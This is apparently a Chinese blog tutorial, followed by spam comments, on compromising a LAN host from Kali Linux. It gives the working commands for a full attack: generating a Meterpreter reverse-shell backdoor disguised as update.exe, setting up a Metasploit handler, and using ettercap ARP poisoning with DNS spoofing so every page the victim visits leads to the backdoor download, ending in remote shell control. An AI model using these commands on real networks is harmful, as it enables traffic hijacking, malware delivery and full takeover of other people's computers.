• 欢迎访问金笔头博客,这是一个菜鸟(伪)程序员的自留地,欢迎访问我的github:点击进入

kali-Linux_DNS欺骗实现内网渗透

Kali eason 15073次浏览 6个评论 扫描二维码

环境部署:kali-Linux + Windows XP SP3

所需工具:Msf + ettercap + apache2

目标主机:192.168.1.12

kali-Linux_DNS欺骗实现内网渗透

攻击主机:192.168.1.7

kali-Linux_DNS欺骗实现内网渗透

1.首先用msfpayload 生成内个有效的WIN可执行后门

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 X > /var/www/update.exe

kali-Linux_DNS欺骗实现内网渗透

查看生成的后门程序

kali-Linux_DNS欺骗实现内网渗透

2.编辑HTML页面,因为是测试,所以这里随便编辑一下,只要能下载后门程序就行,如精心编辑,将更具有迷惑性。

kali-Linux_DNS欺骗实现内网渗透

3.启动apache2 start

kali-Linux_DNS欺骗实现内网渗透

4.启动msf

root@kali:~# msfconsole

kali-Linux_DNS欺骗实现内网渗透

5.加载漏洞模块和设置攻击载荷并设置参数

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.7

LHOST => 192.168.1.7

msf exploit(handler) > exploit

kali-Linux_DNS欺骗实现内网渗透

6.查找etter.dns并编辑

root@kali:~# locate etter.dns

/etc/ettercap/etter.dns

root@kali:~# leafpad /etc/ettercap/etter.dns

kali-Linux_DNS欺骗实现内网渗透

kali-Linux_DNS欺骗实现内网渗透

7.进行DNS欺骗

root@kali:~# ettercap -T -q -i wlan0 -P dns_spoof -M arp /192.168.1.12/ //

注:第一个//中间为待欺骗的IP地址,留空则为当前局域网所有IP

kali-Linux_DNS欺骗实现内网渗透

此时,目标主机打开任何网页都会指向如下网页

kali-Linux_DNS欺骗实现内网渗透

只要目标主机点击click me并运行exe后门

kali-Linux_DNS欺骗实现内网渗透

Msf将获取一个shell code

kali-Linux_DNS欺骗实现内网渗透

打开目标主机的shell,即cmd窗口,接下来就可以在目标主机上做任何事情了…

kali-Linux_DNS欺骗实现内网渗透

[player autoplay=”1″]


金笔头博客, 版权所有丨如未注明 , 均为原创, 转载请注明kali-Linux_DNS欺骗实现内网渗透
喜欢 (3)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(6)个小伙伴在吐槽
  1. This is one awesome article post.Much thanks again. Fantastic.
    ottoman coffee tables2016-02-10 18:57 Reply Windows XP | Firefox 3.5.3
  2. This is one awesome blog article.Really looking forward to read more.
    Party bus rental Chicago prices2016-02-07 19:31 Reply Windows XP | Firefox 3.0.14
  3. Say, you got a nice post.Really looking forward to read more. Cool.
    eebest82016-02-02 21:53 Reply Windows XP | Firefox 3.5.3
  4. Thank you for your post.Really thank you! Awesome.
    young porn2016-01-02 07:21 Reply Windows XP | Opera 9.64
  5. 不错的文章,内容义正词严.禁止此消息:nolinkok@163.com
    尼龙树脂管2015-11-02 22:44 Reply Windows 7 | 未知浏览器
  6. 来支持一下,欢迎回访哦!
    小小蚂蚁博客2015-09-06 05:01 Reply Windows 10 | Firefox 40.0